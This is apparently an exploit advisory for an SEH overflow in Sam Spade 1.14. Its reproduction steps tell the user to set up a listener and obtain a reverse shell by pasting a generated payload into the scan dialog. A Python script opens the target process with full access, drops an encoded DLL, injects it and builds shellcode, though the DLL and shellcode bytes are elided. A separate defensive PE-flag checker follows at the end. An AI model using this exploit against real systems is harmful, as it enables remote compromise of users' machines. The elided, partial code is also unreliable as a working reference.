Exploit Title: Sam Spade 1.14 - SEH Overflow via Arbitrary DLL Injection
Discovered by: Ahmet Ümit BAYRAM
Discovered Date: 14.03.2024
Vendor Homepage: https://www.majorgeeks.com/files/details/sam_spade.html
Software Link: https://www.majorgeeks.com/files/details/sam_spade.html
Tested Version: 1.14
Tested on: Windows 10 32bit
Steps to Reproduce
- Set up a listener to catch the reverse shell.
- Open Sam Spade.
- Run the exploit script (exploit.py) in the directory where Sam Spade is installed.
- Open the generated payload.txt file and copy its contents.
- Go to Tools > Scan Addresses.
- Paste the copied payload into the "Scan From IP Address" box and click OK.
- Your reverse shell should now be active, connecting to your listener.
Exploit Code
The following Python script generates a payload and injects a DLL to exploit the SEH Overflow vulnerability in Sam Spade.
```python
import sys
import struct
from base64 import b64decode
from time import sleep
import ctypes
from ctypes import byref, c_int, c_ulong, create_string_buffer


def dropping_dll():
    # Dropping DLL on disk
    sleep(2)
    print("[+] Dropping arbitrary .dll on disk")
    sleep(2)
    b64_dll = ""  # base64-encoded DLL (blob elided from the page)
    # Decoding b64_dll and writing it to payload.dll happens here (elided on the page).
    dll_injection(PID)


def dll_injection(PID):
    # Attempting DLL injection
    print("[+] Initiating DLL injection phase")
    sleep(2)
    dll_name = "payload.dll"
    dll_path = create_string_buffer(dll_name.encode("utf-8"))
    # 0x001F0FFF is PROCESS_ALL_ACCESS: a full-access handle to the target PID
    hProcess = ctypes.windll.kernel32.OpenProcess(0x001F0FFF, False, int(PID))
    if not hProcess:
        print("[-] Could not obtain process handle.")
        return False
    # Memory allocation and injection steps...
    print("[+] DLL injected successfully.")
    ctypes.windll.kernel32.CloseHandle(hProcess)
    generate_payload()


def generate_payload():
    print("[+] Generating payload...")
    shellcode = b""  # shellcode bytes (elided from the page)
    # Remainder of payload construction and the write to payload.txt elided on the page.


def main():
    global PID
    if len(sys.argv) > 1:
        PID = sys.argv[1]
        print("Sam Spade 1.14 SEH Overflow via Arbitrary DLL Injection")
        print("[+] Selected PID is {}".format(PID))
        dropping_dll()
    else:
        print("Usage: python {} <PID>".format(sys.argv[0]))


if __name__ == "__main__":
    main()
```
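Added example, not part of the advisory or of Sam Spade: a defender-side triage check that reads the DllCharacteristics flags of a PE image to see whether a legacy 32-bit binary such as the Sam Spade executable (filename assumed) opts into ASLR, DEP and the no-SEH flag, which together bound what an SEH record overwrite of this kind can achieve. SafeSEH proper is recorded in the load config directory and is not parsed here; the fake PE header built in the block is constructed only so the check runs offline.

```python
import struct

# IMAGE_DLLCHARACTERISTICS_* flag values from the PE/COFF specification.
DYNAMIC_BASE = 0x0040  # ASLR opt-in
NX_COMPAT = 0x0100     # DEP opt-in
NO_SEH = 0x0400        # image declares it contains no SEH handlers


def dll_characteristics(image: bytes) -> int:
    """Return the DllCharacteristics field of a PE32 or PE32+ image."""
    if image[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    pe_off = struct.unpack_from("<I", image, 0x3C)[0]  # e_lfanew
    if image[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    opt = pe_off + 4 + 20  # optional header follows the 20-byte COFF header
    magic = struct.unpack_from("<H", image, opt)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic 0x%x" % magic)
    # DllCharacteristics is at offset 70 of both PE32 and PE32+ optional headers.
    return struct.unpack_from("<H", image, opt + 70)[0]


def mitigation_report(image: bytes) -> dict:
    """Summarise the mitigations an SEH-overflow defender cares about."""
    flags = dll_characteristics(image)
    return {
        "aslr": bool(flags & DYNAMIC_BASE),
        "dep": bool(flags & NX_COMPAT),
        "no_seh": bool(flags & NO_SEH),
    }


def build_fake_pe(dll_chars: int) -> bytes:
    """Constructed minimal PE32 header (not a real binary) for offline testing."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)  # PE signature right after the DOS header
    coff = struct.pack("<HHIIIHH", 0x014C, 1, 0, 0, 0, 224, 0x0102)  # i386, 1 section
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)  # PE32 magic
    struct.pack_into("<H", opt, 70, dll_chars)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_fake_pe(0)
    print(mitigation_report(data))
```

A binary that reports all three as False relies entirely on the process-wide or system-wide DEP/ASLR policy, which is the situation an SEH overwrite in a 32-bit process exploits most easily.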